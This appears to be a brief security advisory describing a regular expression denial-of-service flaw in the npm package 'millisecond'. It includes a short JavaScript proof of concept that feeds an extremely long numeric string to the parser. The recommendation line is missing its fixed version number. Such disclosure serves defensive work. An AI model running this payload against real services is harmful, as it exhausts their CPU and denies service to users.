Regular Expression Denial of Service in millisecond
Versions of millisecond are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed. ## Proof of concept var ms = require('millisecond'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } ms(genstr(process.argv[2], "5") + " minutea"); ``` ## Recommendation Update to or later.